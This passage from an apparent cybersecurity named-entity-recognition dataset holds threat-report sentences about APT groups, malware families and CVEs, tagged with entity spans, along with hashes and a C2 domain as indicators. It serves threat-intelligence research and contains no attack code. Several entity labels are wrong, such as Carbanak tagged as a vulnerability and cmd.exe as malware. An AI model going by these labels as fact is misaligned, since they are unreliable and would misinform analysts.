{"id": "cyberner_stix_train_002458", "source": "cyberner_stix_train"}} {"text": "The GolfSpy malware embedded in the apps is hardcoded with an internal name used by the attacker . Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets . The second one , which in many cases is an Office document protected with a trivial password , such as “ 12345 ” , “ 1234 ” , etc. , uses macros to execute a GRIFFON implant on the target’s computer . 
Whether known as commodity malware or “ as - a - service , ” threat actors have long been turning to their fellow adversaries in the hopes of selling off their tools and opening a new stream of revenue .", "spans": {"MALWARE: GolfSpy": [[4, 11]], "THREAT_ACTOR: ScarCruft": [[148, 157]], "VULNERABILITY: zero-day exploits": [[191, 208]], "TOOL: Office": [[289, 295]], "TOOL: macros": [[384, 390]], "MALWARE: GRIFFON": [[404, 411]], "MALWARE: commodity malware": [[464, 481]], "THREAT_ACTOR: threat actors": [[508, 521]]}, "info": {"id": "cyberner_stix_train_002459", "source": "cyberner_stix_train"}} {"text": "This connection suggests that the group uses phishing emails with ZIP attachments that contain LNK files as an initial access vector .", "spans": {"TOOL: emails": [[54, 60]], "TOOL: ZIP": [[66, 69]], "TOOL: LNK": [[95, 98]]}, "info": {"id": "cyberner_stix_train_002460", "source": "cyberner_stix_train"}} {"text": "We decided to spend some time to investigate around this malware and found out that it was used exclusively by a single group of attackers . 
Myanmar has been the target of Mofang 's attacks for years before the campaign related to the sez .", "spans": {"THREAT_ACTOR: group": [[120, 125]], "THREAT_ACTOR: attackers": [[129, 138]], "THREAT_ACTOR: Mofang": [[172, 178]]}, "info": {"id": "cyberner_stix_train_002461", "source": "cyberner_stix_train"}} {"text": "Comparing the GeminiDuke compilation timestamps , which always reference the time in the UTC+0 timezone , with the local time timestamps used as mutex names , and adjusting for the presumed timezone difference , we note that all of the mutex names reference a time and date that is within seconds of the respective sample ’s compilation timestamp .", "spans": {"MALWARE: GeminiDuke": [[14, 24]]}, "info": {"id": "cyberner_stix_train_002462", "source": "cyberner_stix_train"}} {"text": "The list of information collected includes :", "spans": {}, "info": {"id": "cyberner_stix_train_002463", "source": "cyberner_stix_train"}} {"text": "MITRE ATT & CK techniques Tactic ID Name Description Initial Access T1475 Deliver Malicious App via Authorized App Store The malware impersonates legitimate services on Google Play Persistence T1402 App Auto-Start at Device Boot An Android application can listen for the BOOT_COMPLETED broadcast , ensuring that the app 's functionality will be activated every time the device starts Impact T1472 Generate Fraudulent Advertising Revenue Generates revenue by automatically displaying ads The Rotexy mobile Trojan – banker and ransomware 22 NOV 2018 On Whitefly first infects its victims using a dropper in the form of a malicious.exe or .dll file that is disguised as a document or image . 
Therefore , it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer .", "spans": {"ORGANIZATION: MITRE": [[0, 5]], "SYSTEM: Google Play": [[169, 180]], "MALWARE: Rotexy": [[491, 497]], "THREAT_ACTOR: Whitefly": [[551, 559]], "TOOL: dropper": [[594, 601]], "MALWARE: malicious.exe": [[619, 632]], "MALWARE: .dll file": [[636, 645]], "MALWARE: HIDDEN COBRA malware": [[732, 752]], "MALWARE: Volgmer": [[811, 818]]}, "info": {"id": "cyberner_stix_train_002464", "source": "cyberner_stix_train"}} {"text": "There are several strings and labels still mentioning 'test ' or 'testcc ' — even the URL used for the credit card data exfiltration is named \" testcc.php . The developer consistently used Accept-Enconding” (note the extra ‘n’) in all DanBot samples analyzed by CTU researchers . APT38 also targeted financial transaction exchange companies likely because of their proximity to banks .", "spans": {"MALWARE: DanBot": [[235, 241]], "ORGANIZATION: CTU": [[262, 265]], "THREAT_ACTOR: APT38": [[280, 285]], "ORGANIZATION: financial transaction exchange companies": [[300, 340]], "ORGANIZATION: banks": [[378, 383]]}, "info": {"id": "cyberner_stix_train_002465", "source": "cyberner_stix_train"}} {"text": "In activity analyzed by CTU researchers , TG-3390 executed the Hunter web application scanning tool against a target server running IIS .", "spans": {"ORGANIZATION: CTU": [[24, 27]], "THREAT_ACTOR: TG-3390": [[42, 49]], "TOOL: Hunter": [[63, 69]], "TOOL: IIS": [[132, 135]]}, "info": {"id": "cyberner_stix_train_002466", "source": "cyberner_stix_train"}} {"text": "In this way , the malware authors can submit their app and add the malicious capabilities only after their app is live on the Play Store . During that phase , the APT32 operated a fileless PowerShell-based infrastructure , using customized PowerShell payloads taken from known offensive frameworks such as Cobalt Strike , PowerSploit and Nishang . 
Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities Throughout the autumn of 2018 we analyzed a long-standing (and still active at that time) cyber-espionage campaign that was primarily targeting foreign diplomatic entities based in Iran . STRATOFEAR ( com.google.kservice , us.zoom . ZoomService )", "spans": {"SYSTEM: Play Store": [[126, 136]], "THREAT_ACTOR: APT32": [[163, 168]], "TOOL: customized PowerShell": [[229, 250]], "TOOL: Cobalt Strike": [[306, 319]], "TOOL: PowerSploit": [[322, 333]], "TOOL: Nishang": [[338, 345]], "THREAT_ACTOR: Chafer": [[348, 354]], "MALWARE: Remexi": [[360, 366]], "MALWARE: STRATOFEAR": [[612, 622]]}, "info": {"id": "cyberner_stix_train_002467", "source": "cyberner_stix_train"}} {"text": "] fun , you-foto [ . TG-3390 SWCs may be largely geographically independent , but the group 's most frequently used C2 registrars and IP net blocks are located in the U.S . 0c458dfe0a2a01ab300c857fdc3373b75fbb8ccfa23d16eff0d6ab888a1a28f6 The utility is located in the “ \\sc\\prog\\exec ” folder within the MicroSCADA installation directory , amongst other utilities , libraries , and resources used by MicroSCADA .", "spans": {"THREAT_ACTOR: TG-3390": [[21, 28]]}, "info": {"id": "cyberner_stix_train_002468", "source": "cyberner_stix_train"}} {"text": "Another profile using the handle on a Russian social network currently shows multiple photos of the user in proximity to Moscow for the entire history of the profile .", "spans": {}, "info": {"id": "cyberner_stix_train_002469", "source": "cyberner_stix_train"}} {"text": "TEMP.Periscope BackgroundActive since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . 
Recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the GozNym group appears up to the task .", "spans": {"THREAT_ACTOR: TEMP.Periscope": [[0, 14], [54, 68]], "ORGANIZATION: maritime-related": [[94, 110]], "ORGANIZATION: engineering firms": [[157, 174]], "ORGANIZATION: shipping": [[177, 185]], "ORGANIZATION: transportation": [[190, 204]], "ORGANIZATION: manufacturing": [[207, 220]], "ORGANIZATION: defense": [[223, 230]], "ORGANIZATION: government": [[233, 243]], "ORGANIZATION: research universities": [[258, 279]], "ORGANIZATION: bank": [[314, 318]], "ORGANIZATION: Kessem": [[354, 360]]}, "info": {"id": "cyberner_stix_train_002470", "source": "cyberner_stix_train"}} {"text": "] 205 [ . We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit . The script will take an embedded PE file that has been base64 encoded and inject that into the current PowerShell process . 
Mandiant identified UNC4899 targeting MacOS keychains and reconnaissance data associated with executives and internal security teams .", "spans": {"VULNERABILITY: CVE-2013-0640": [[74, 87]], "TOOL: MiniDuke": [[98, 106]], "VULNERABILITY: zero-day": [[160, 168]], "THREAT_ACTOR: group": [[190, 195]], "TOOL: PE": [[252, 254]], "TOOL: PowerShell": [[322, 332]], "ORGANIZATION: MacOS keychains": [[381, 396]], "ORGANIZATION: reconnaissance data associated with executives and internal security teams": [[401, 475]]}, "info": {"id": "cyberner_stix_train_002471", "source": "cyberner_stix_train"}} {"text": "Cannon takes a screenshot and saves it to a file named ops .", "spans": {"MALWARE: Cannon": [[0, 6]]}, "info": {"id": "cyberner_stix_train_002472", "source": "cyberner_stix_train"}} {"text": "Highlights Samples of the malicious code found in BrainTest have been found on Google Play , and its creator has used multiple methods to evade detection by Google including Bypassing Google Bouncer by detecting if the malware is being run from an IP or domain mapped to Google Bouncer and , if so , it will not perform its intended malicious activities . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . 
APT10 achieves persistence on its targets primarily by using scheduled tasks or Windows services in order to ensure the malware remains active regardless of system reboots .", "spans": {"MALWARE: BrainTest": [[50, 59]], "SYSTEM: Google Play": [[79, 90]], "ORGANIZATION: Google": [[157, 163]], "SYSTEM: Google Bouncer": [[184, 198], [271, 285]], "VULNERABILITY: Carbanak": [[376, 384]], "THREAT_ACTOR: criminals": [[451, 460]], "ORGANIZATION: financial industry": [[501, 519]], "ORGANIZATION: customers": [[543, 552]], "THREAT_ACTOR: APT10": [[555, 560]], "MALWARE: scheduled tasks": [[616, 631]], "MALWARE: Windows services": [[635, 651]]}, "info": {"id": "cyberner_stix_train_002473", "source": "cyberner_stix_train"}} {"text": "The Sofacy group continues their targeted attack campaigns in 2018 .", "spans": {"THREAT_ACTOR: Sofacy": [[4, 10]]}, "info": {"id": "cyberner_stix_train_002474", "source": "cyberner_stix_train"}} {"text": "The malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits , including the EternalBlue exploit used in the WannaCry attack from May 2017 . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": {"MALWARE: malware": [[4, 11]], "TOOL: EternalBlue exploit": [[168, 187]], "THREAT_ACTOR: WannaCry": [[200, 208]], "MALWARE: Carbanak": [[232, 240]], "ORGANIZATION: consumer": [[308, 316]], "MALWARE: Carberp": [[408, 415]]}, "info": {"id": "cyberner_stix_train_002475", "source": "cyberner_stix_train"}} {"text": "Snake Wine was first publicly disclosed by FireEye in this report . 
In July of 2015 , we identified a full e-mail uploaded to an antivirus scanning service that carried a Scarlet Mimic exploit document .", "spans": {"ORGANIZATION: FireEye": [[43, 50]], "TOOL: e-mail": [[107, 113]], "TOOL: Scarlet Mimic": [[171, 184]], "VULNERABILITY: exploit": [[185, 192]]}, "info": {"id": "cyberner_stix_train_002476", "source": "cyberner_stix_train"}} {"text": "These signatures and rules should be used to supplement analysis and should not be used as a sole source of attributing this activity to HIDDEN COBRA actors .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[137, 149]]}, "info": {"id": "cyberner_stix_train_002477", "source": "cyberner_stix_train"}} {"text": "These campaigns are specifically directed at entities and individuals in the Palestinian territories .", "spans": {}, "info": {"id": "cyberner_stix_train_002478", "source": "cyberner_stix_train"}} {"text": "The initial sample we intercepted was a Microsoft Word document ( SHA256 : 2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f ) with the filename crash list ( Lion Air Boeing 737 ).docx using the author name Joohn .", "spans": {"ORGANIZATION: Microsoft": [[40, 49]], "TOOL: Word": [[50, 54]], "FILEPATH: 2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f": [[75, 139]], "FILEPATH: crash list ( Lion Air Boeing 737 ).docx": [[160, 199]]}, "info": {"id": "cyberner_stix_train_002479", "source": "cyberner_stix_train"}} {"text": "Whitefly has consistently used a technique known as search order hijacking to run Vcrodat . 
If the lateral movement with credentials fails , then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue , and uses it to spread to that host .", "spans": {"THREAT_ACTOR: Whitefly": [[0, 8]], "TOOL: search order hijacking": [[52, 74]], "TOOL: Vcrodat": [[82, 89]], "MALWARE: PingCastle MS17-010": [[163, 182]], "VULNERABILITY: EternalBlue": [[310, 321]]}, "info": {"id": "cyberner_stix_train_002480", "source": "cyberner_stix_train"}} {"text": "Such an action can be performed at any moment , regardless of the current application or user location in that application . We do not know whether using PIVY is an attempt by those behind the Molerats campaign to frame China-based threat actors for their attacks or simply evidence that they have added another effective , publicly-available RAT to its arsenal . In late June 2018 , Unit 42 revealed a previously unknown cyber espionage group we dubbed Rancor , which conducted targeted attacks in Southeast Asia E-LOC throughout 2017 and 2018 . The session takeovers bypassed password and multi - factor authentication .", "spans": {"TOOL: PIVY": [[154, 158]], "THREAT_ACTOR: threat actors": [[232, 245]], "TOOL: RAT": [[343, 346]], "ORGANIZATION: Unit 42": [[384, 391]], "THREAT_ACTOR: Rancor": [[454, 460]]}, "info": {"id": "cyberner_stix_train_002481", "source": "cyberner_stix_train"}} {"text": "Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . 
The two malware families themselves are also very similar , and therefore we think that the shared technique is an indication of a single developer , or development company , behind both CONFUCIUS_A and CONFUCIUS_B .", "spans": {"MALWARE: More_eggs malware": [[31, 48]], "MALWARE: cmd.exe": [[132, 139]], "ORGANIZATION: development company": [[295, 314]], "FILEPATH: CONFUCIUS_A": [[329, 340]], "FILEPATH: CONFUCIUS_B": [[345, 356]]}, "info": {"id": "cyberner_stix_train_002482", "source": "cyberner_stix_train"}} {"text": "Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . Also our visibility as a vendor does not cover every company in the world ( at least so far ; ) ) and the Kaspersky Security Network ( KSN ) did not reveal other attacks except those against gaming companies .", "spans": {"MALWARE: malicious.DOC": [[86, 99]], "VULNERABILITY: Microsoft Common Controls vulnerability": [[119, 158]], "VULNERABILITY: CVE-2012-0158": [[161, 174]], "ORGANIZATION: Kaspersky Security Network": [[283, 309]], "ORGANIZATION: KSN": [[312, 315]], "ORGANIZATION: gaming companies": [[368, 384]]}, "info": {"id": "cyberner_stix_train_002483", "source": "cyberner_stix_train"}} {"text": "MainService is the brain of this spyware and controls almost everything—from stealing the victim 's data to deleting it . SPEAR has observed numerous different XOR keys utilized by Ghost Dragon . 
Before acting on the request , Winnti will validate the third DWORD contains the magic value 0xABC18CBA before executing tasking .", "spans": {"THREAT_ACTOR: Ghost Dragon": [[181, 193]], "MALWARE: Winnti": [[227, 233]], "TOOL: DWORD": [[258, 263]]}, "info": {"id": "cyberner_stix_train_002484", "source": "cyberner_stix_train"}} {"text": "Threat groups outside of China are unlikely to target the Uyghur people .", "spans": {}, "info": {"id": "cyberner_stix_train_002485", "source": "cyberner_stix_train"}} {"text": "A company representative declined to comment for this post . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations . LaZagne ( SecurityRisk.LaZagne ) : A login/password retrieval tool . Talos provided a highly informative article on the PREDATOR commercial spyware , which has been around since 2019 .", "spans": {"THREAT_ACTOR: Lazarus": [[105, 112]], "ORGANIZATION: Bitcoin users": [[190, 203]], "ORGANIZATION: financial organizations": [[215, 238]], "MALWARE: LaZagne": [[241, 248]], "MALWARE: SecurityRisk.LaZagne": [[251, 271]], "ORGANIZATION: Talos": [[310, 315]], "MALWARE: PREDATOR": [[361, 369]]}, "info": {"id": "cyberner_stix_train_002486", "source": "cyberner_stix_train"}} {"text": "Notice notice the use of the mistaken “ Word ” instead of “ World ” : “ On behalf of all at the Word Uyghur Congress ( WUC ) , the Unrepresented Nations and Peoples Organization ( UNPO ) and the Society for Threatened Peoples ( STP ) , Human Rights in China : Implications for East Turkestan , Tibet and Southern Mongolia In what was an unprecedented coming-together of leading Uyghur , Mongolian , Tibetan and Chinese activists , as well as other leading international experts , we were greatly humbled In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit 
while the vulnerability was publicly unknown . In the spring of 2014 , we noticed an increase in the volume of attack activity by the Naikon APT .", "spans": {"ORGANIZATION: Word Uyghur Congress ( WUC )": [[96, 124]], "ORGANIZATION: Unrepresented Nations and Peoples Organization ( UNPO )": [[131, 186]], "ORGANIZATION: Society for Threatened Peoples ( STP )": [[195, 233]], "THREAT_ACTOR: activity groups": [[543, 558]], "THREAT_ACTOR: PROMETHIUM": [[561, 571]], "THREAT_ACTOR: NEODYMIUM": [[576, 585]], "VULNERABILITY: zeroday exploit": [[644, 659]], "THREAT_ACTOR: Naikon APT": [[794, 804]]}, "info": {"id": "cyberner_stix_train_002487", "source": "cyberner_stix_train"}} {"text": "The core malware extracts the device ’ s installed app list . The campaign code \" 20150920 \" is associated with this decoy , which is a week prior to media articles announcing that the Crown Price of Thailand Maha Vajiralongkorn will lead the Bike for Dad 2015 event . Dexphot then used fileless techniques to run malicious code directly in memory , leaving only a few traces that can be used for forensics . APT29 has also used legitimate web services such as Dropbox and Constant Contact in their operations .", "spans": {"ORGANIZATION: media": [[150, 155]], "MALWARE: Dexphot": [[269, 276]], "THREAT_ACTOR: APT29": [[409, 414]]}, "info": {"id": "cyberner_stix_train_002488", "source": "cyberner_stix_train"}} {"text": "The raw wave audio buffer frame can be dumped in the getNextBuffer ( ) function . Charming Kitten is an Iranian cyberespionage group operating since approximately 2014 . 
the v3 and v7 variables are assigned to the block comparison variable ( b_cmp ) Function has a couple of Anti debugging Anti Emulation checks .", "spans": {"THREAT_ACTOR: Charming Kitten": [[82, 97]], "THREAT_ACTOR: cyberespionage group": [[112, 132]], "TOOL: Anti debugging": [[275, 289]], "TOOL: Anti Emulation checks": [[290, 311]]}, "info": {"id": "cyberner_stix_train_002489", "source": "cyberner_stix_train"}} {"text": "To make the fraudulent withdrawals , Lazarus first breaches targeted banks' networks and compromises the switch application servers handling ATM transactions . In 2016 , CTU researchers observed the group using native system .", "spans": {"THREAT_ACTOR: Lazarus": [[37, 44]], "ORGANIZATION: banks'": [[69, 75]], "ORGANIZATION: CTU": [[170, 173]]}, "info": {"id": "cyberner_stix_train_002490", "source": "cyberner_stix_train"}} {"text": "'' Strazzere says he also failed to reach MediaTek , a Taiwanese fabless semiconductor manufacturer whose chipsets that powered BLU phones also contained Adups software . CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption . C2 : lywjrea.gmarketshop.net .", "spans": {"ORGANIZATION: MediaTek": [[42, 50]], "ORGANIZATION: BLU": [[128, 131]], "ORGANIZATION: Adups": [[154, 159]], "VULNERABILITY: CVE-2018-0798": [[171, 184]], "THREAT_ACTOR: threat actor": [[262, 274]], "TOOL: C2": [[305, 307]], "DOMAIN: lywjrea.gmarketshop.net": [[310, 333]]}, "info": {"id": "cyberner_stix_train_002491", "source": "cyberner_stix_train"}} {"text": "Our analysis shows the DEFENSOR ID trojan can execute 17 commands received from the attacker-controlled server such as uninstalling an app , launching an app and then performing any click/tap action controlled remotely by the attacker ( see Figure 5 ) . On June 17 , we observed the campaign’s spam emails delivering malware-embedded Excel files directly as an attachment . 
McAfee Advanced Threat Research ( ATR ) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact .", "spans": {"MALWARE: DEFENSOR ID": [[23, 34]], "ORGANIZATION: McAfee Advanced Threat Research": [[374, 405]], "ORGANIZATION: ATR": [[408, 411]], "THREAT_ACTOR: Lazarus": [[526, 533]], "MALWARE: sophisticated": [[544, 557]], "MALWARE: malware": [[558, 565]]}, "info": {"id": "cyberner_stix_train_002492", "source": "cyberner_stix_train"}} {"text": "After installing this AntSword webshell , the actor no longer uses the Awen webshell and issues the first command to AntSword 35 seconds after the last command issued to the Awen webshell .", "spans": {"TOOL: AntSword": [[22, 30], [117, 125]], "TOOL: Awen": [[71, 75], [174, 178]]}, "info": {"id": "cyberner_stix_train_002493", "source": "cyberner_stix_train"}} {"text": "zygotedaemoni686 2019-01-08 04:55:00 3c9f08b3280851f54414dfa5a57f40d3b7be7b73736fa0ba21b078e75ce54d33 sapp.apk 2019-01-08 04:53:00 4bf1446c412dd5c552539490d03e999a6ceb96ae60a9e7846427612bec316619 placeholder 2018-03-29 16:31:00 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 During the past month , Unit 42 observed several attacks against a Middle Eastern government leveraging an updated version of the BONDUPDATER malware , which now includes the ability to use TXT records within its DNS tunneling protocol for its C2 communications . JhoneRAT : 29886dbbe81ead9e9999281e62ecf95d07acb24b9b0906b28beb65a84e894091 . 
Adversaries may perform data destruction over the course of an operation .", "spans": {"ORGANIZATION: Unit 42": [[317, 324]], "ORGANIZATION: government": [[375, 385]], "TOOL: BONDUPDATER malware": [[423, 442]], "TOOL: DNS tunneling": [[506, 519]], "MALWARE: JhoneRAT": [[557, 565]], "FILEPATH: 29886dbbe81ead9e9999281e62ecf95d07acb24b9b0906b28beb65a84e894091": [[568, 632]]}, "info": {"id": "cyberner_stix_train_002494", "source": "cyberner_stix_train"}} {"text": "Based on analysis of the data and malware samples we have collected , Unit 42 believes the attacks described herein are the work of a group or set of cooperating groups who have a single mission , collecting information on minority groups who reside in and around northwestern China . APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns .", "spans": {"ORGANIZATION: Unit 42": [[70, 77]], "THREAT_ACTOR: group": [[134, 139]], "THREAT_ACTOR: groups": [[162, 168]], "ORGANIZATION: minority groups": [[223, 238]], "THREAT_ACTOR: APT39": [[285, 290]], "ORGANIZATION: telecommunications and travel industries": [[307, 347]], "ORGANIZATION: specific individuals": [[434, 454]]}, "info": {"id": "cyberner_stix_train_002495", "source": "cyberner_stix_train"}} {"text": "This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . 
According to ClearSky , the suspected Lazarus operatives looked to leverage a vulnerability in outdated WinRAR file-archiving software that hackers have been exploiting since it was disclosed last month .", "spans": {"MALWARE: bait document": [[5, 18]], "MALWARE: Word document": [[68, 81]], "VULNERABILITY: CVE-2012-0158": [[102, 115]], "ORGANIZATION: ClearSky": [[286, 294]], "FILEPATH: WinRAR": [[377, 383]]}, "info": {"id": "cyberner_stix_train_002496", "source": "cyberner_stix_train"}} {"text": "To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . Another set of attacks called Operation Erebus leverages another flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation .", "spans": {"TOOL: Remote Desktop Protocol": [[57, 80]], "TOOL: RDP": [[83, 86]], "VULNERABILITY: Carbanak": [[91, 99]], "TOOL: flash": [[215, 220]], "VULNERABILITY: exploit": [[221, 228]], "VULNERABILITY: CVE-2016-4117": [[231, 244]]}, "info": {"id": "cyberner_stix_train_002497", "source": "cyberner_stix_train"}} {"text": "Another option is to simply halt and quarantine the Winnti implant itself , stopping the intrusion on a single machine .", "spans": {"MALWARE: Winnti implant": [[52, 66]]}, "info": {"id": "cyberner_stix_train_002498", "source": "cyberner_stix_train"}} {"text": "If the user unlocks their device , they will see a black screen while the app drops the call , resets call settings and prepares for the user to interact with the device normally . Active since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . The rest of the content is a byte for byte copy . 
The new exploit method bypasses URL rewrite mitigations for the endpoint provided by Microsoft in response to •", "spans": {"THREAT_ACTOR: TEMP.Periscope": [[210, 224]], "ORGANIZATION: engineering firms": [[313, 330]], "ORGANIZATION: shipping": [[333, 341]], "ORGANIZATION: transportation": [[346, 360]], "ORGANIZATION: manufacturing": [[363, 376]], "ORGANIZATION: defense": [[379, 386]], "ORGANIZATION: government offices": [[389, 407]], "ORGANIZATION: research universities": [[414, 435]], "ORGANIZATION: Microsoft": [[573, 582]]}, "info": {"id": "cyberner_stix_train_002499", "source": "cyberner_stix_train"}} {"text": "The setup code receives an installation command from the previous stage . APT35 has historically used unsophisticated tools like those listed below in Figure 3 . Both values are supplied from an array of 256 pseudo-random bytes hardcoded in the binary’s .rdata section . Methods of manipulating control can include changes to set point values , tags , or other parameters .", "spans": {"THREAT_ACTOR: APT35": [[74, 79]], "TOOL: unsophisticated tools": [[102, 123]]}, "info": {"id": "cyberner_stix_train_002500", "source": "cyberner_stix_train"}} {"text": "Instances of this spyware were found on the Google Play Store , disguised as service applications from mobile operators . APT34 uses a mix of public and non-public tools ( Fig.2 ) and often uses compromised accounts to conduct spear-phishing operations . The first is responsible for checking if the system has the targeted keyboard layout — this is exclusively in Arabic-speaking countries . 
Our 2023 Ransomware Report unpacks the action in four zones : the US , Germany , France , and the UK .", "spans": {"SYSTEM: Google Play Store": [[44, 61]], "THREAT_ACTOR: APT34": [[122, 127]], "TOOL: public and non-public tools": [[142, 169]], "TOOL: compromised accounts": [[195, 215]], "MALWARE: Ransomware": [[402, 412]]}, "info": {"id": "cyberner_stix_train_002501", "source": "cyberner_stix_train"}} {"text": "In this case Attackers again spoofed an email id associated with Indian Ministry of Home Affairs and the mail was sent on September 1,2016 to an email id associated Thailand Indian embassy , this email was later forwarded on Oct 24th,2016 from a spoofed email of Thailand Indian embassy to various email recipients connected to the Indian Ministry of External Affairs ( MEA ) .", "spans": {"TOOL: email": [[40, 45], [145, 150], [196, 201], [254, 259], [298, 303]], "ORGANIZATION: Indian Ministry of Home Affairs": [[65, 96]], "ORGANIZATION: Indian embassy": [[174, 188], [272, 286]], "ORGANIZATION: Indian Ministry of External Affairs": [[332, 367]], "ORGANIZATION: MEA": [[370, 373]]}, "info": {"id": "cyberner_stix_train_002502", "source": "cyberner_stix_train"}} {"text": "cf32479ed30ae959c4ec8a286bb039425d174062b26054c80572b4625646c551 .", "spans": {"FILEPATH: cf32479ed30ae959c4ec8a286bb039425d174062b26054c80572b4625646c551": [[0, 64]]}, "info": {"id": "cyberner_stix_train_002503", "source": "cyberner_stix_train"}} {"text": "Several other hacker groups have also begun targeting some of the same chemical companies in this time period .", "spans": {}, "info": {"id": "cyberner_stix_train_002504", "source": "cyberner_stix_train"}} {"text": "This translates to “ The Complete Details of Fuqaha ’s Assassination ”", "spans": {}, "info": {"id": "cyberner_stix_train_002505", "source": "cyberner_stix_train"}} {"text": "Rotexy will perform further actions after it receives the corresponding commands : START , STOP , RESTART — start , stop , restart SuperService . 
We had previously observed this author name in use once before , in the very first ThreeDollars document we collected that we had reported on in August 2017 . There are several indicators , which have led CTU researchers to believe with high confidence that NICKEL ACADEMY is behind the current spearphishing campaign .", "spans": {"MALWARE: Rotexy": [[0, 6]], "MALWARE: ThreeDollars document": [[229, 250]], "ORGANIZATION: CTU": [[351, 354]], "THREAT_ACTOR: NICKEL ACADEMY": [[404, 418]]}, "info": {"id": "cyberner_stix_train_002506", "source": "cyberner_stix_train"}} {"text": "The top level malware , CE8B99DF8642C065B6AF43FDE1F786A3 ( named by its authors “ msdeltemp.dll ” according to internal strings , and compiled July 28th , 2015 ) is a rare type of the Sofacy AZZY implant .", "spans": {"FILEPATH: CE8B99DF8642C065B6AF43FDE1F786A3": [[24, 56]], "FILEPATH: msdeltemp.dll": [[82, 95]], "THREAT_ACTOR: Sofacy": [[184, 190]], "MALWARE: AZZY": [[191, 195]]}, "info": {"id": "cyberner_stix_train_002507", "source": "cyberner_stix_train"}} {"text": "The Trojan works by creating an overlay whenever the user launches the banking application . ScarCruft is a relatively new APT group , victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania . Among the artifacts related to malware authors, we found in the binaries a .pdb path containing the Windows user name “Mohamadreza . 
The discovery of COSMICENERGY illustrates that the barriers to entry for developing offensive OT capabilities are lowering as actors leverage knowledge from prior attacks to develop new malware .", "spans": {"THREAT_ACTOR: ScarCruft": [[93, 102]], "THREAT_ACTOR: APT group": [[123, 132]], "FILEPATH: .pdb": [[308, 312]], "SYSTEM: Windows": [[333, 340]], "MALWARE: COSMICENERGY": [[383, 395]]}, "info": {"id": "cyberner_stix_train_002508", "source": "cyberner_stix_train"}} {"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus .", "spans": {"MALWARE: documents": [[4, 13]], "VULNERABILITY: CVE-2012-0158": [[97, 110]], "VULNERABILITY: Microsoft Word vulnerabilities": [[166, 196]], "VULNERABILITY: CVE-2018-8414": [[315, 328]], "THREAT_ACTOR: DarkHydrus": [[418, 428]]}, "info": {"id": "cyberner_stix_train_002509", "source": "cyberner_stix_train"}} {"text": "The creators of the Spark backdoor use a few techniques that are intended to keep the backdoor under-the-radar , including :", "spans": {"MALWARE: Spark backdoor": [[20, 34]]}, "info": {"id": "cyberner_stix_train_002510", "source": "cyberner_stix_train"}} {"text": "android.intent.action.CONNECTIVITY_CHANGE System notification that a change in network connectivity has occurred , either lost or established . APT41 has blatantly engaged in financially motivated activity targeting the video game industry , including manipulating virtual currencies . 
The primary targets of APT28 are potential victims in several countries such as Ukraine , Spain , Russia , Romania , the United States and Canada .", "spans": {"THREAT_ACTOR: APT41": [[144, 149]], "ORGANIZATION: video game industry": [[220, 239]], "THREAT_ACTOR: APT28": [[309, 314]]}, "info": {"id": "cyberner_stix_train_002511", "source": "cyberner_stix_train"}} {"text": "Cybercriminals also exploit the Master Key vulnerability and have learned to embed unsigned executable files in Android installation packages . If the address falls within ranges that the attackers are interested in , the malicious site waits for their next page view to drop an exploit on the desirable target 's PC . After having been decrypted , ShadowPad ’s shellcode is executed . But then , following an upsurge in attacks in the second half of 2014 , GReAT characterized MiniDuke , CosmicDuke and the actor ’s Nemesis Gemina project - targeting government , diplomatic , energy , military and telecom operators - as ‘ one of the world ’s most unusual APT operations ’ due to : • Its use of a customized backdoor written in Assembler using ‘ old school ’ virus writing techniques and habits • Stealthy transfer of updates as executables hidden inside GIF files ( a form of steganography )", "spans": {"VULNERABILITY: Master Key vulnerability": [[32, 56]], "SYSTEM: Android": [[112, 119]], "MALWARE: ShadowPad": [[349, 358]], "TOOL: shellcode": [[362, 371]], "ORGANIZATION: GReAT": [[458, 